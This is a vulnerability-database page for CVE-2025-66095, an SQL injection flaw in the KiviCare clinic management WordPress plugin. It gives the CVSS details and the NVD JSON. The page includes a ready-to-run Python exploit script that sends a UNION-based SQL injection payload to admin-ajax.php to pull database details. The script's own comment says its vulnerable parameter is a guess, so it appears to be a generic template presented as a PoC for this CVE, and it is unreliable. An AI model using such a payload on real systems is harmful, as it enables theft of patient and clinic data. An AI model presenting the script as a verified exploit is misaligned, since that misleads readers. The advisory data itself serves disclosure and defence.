Security Vulnerability Report
中文
CVE-2025-66095 CVSS 8.5 HIGH

CVE-2025-66095

Published: 2025-11-21 13:15:51
Last Modified: 2026-04-27 18:16:35

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Iqonic Design KiviCare kivicare-clinic-management-system allows SQL Injection.This issue affects KiviCare: from n/a through <= 3.6.13.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

KiviCare Clinic Management System <= 3.6.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66095 SQL Injection PoC for KiviCare <= 3.6.13 # Target: KiviCare Clinic Management System WordPress Plugin def exploit_sql_injection(target_url, session_cookie): """ SQL Injection PoC - Extract database version and current database name """ headers = { 'Cookie': session_cookie, 'Content-Type': 'application/x-www-form-urlencoded' } # Vulnerable endpoint - adjust based on actual vulnerable parameter vulnerable_param = 'patient_id' # SQL Injection payload to extract database information # Using UNION-based injection technique payload = f"1' UNION SELECT NULL,NULL,version(),database(),NULL,NULL,NULL,NULL-- -" exploit_url = f"{target_url}/wp-admin/admin-ajax.php" data = { 'action': 'kivicare_get_patient_details', vulnerable_param: payload } try: response = requests.post(exploit_url, headers=headers, data=data, timeout=30) if response.status_code == 200: print(f'[+] Exploit sent successfully') print(f'[+] Response: {response.text[:500]}') return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2025-66095.py <target_url> <session_cookie>') sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit_sql_injection(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66095", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:50.877", "lastModified": "2026-04-27T18:16:35.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Iqonic Design KiviCare kivicare-clinic-management-system allows SQL Injection.This issue affects KiviCare: from n/a through <= 3.6.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/kivicare-clinic-management-system/vulnerability/wordpress-kivicare-plugin-3-6-13-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}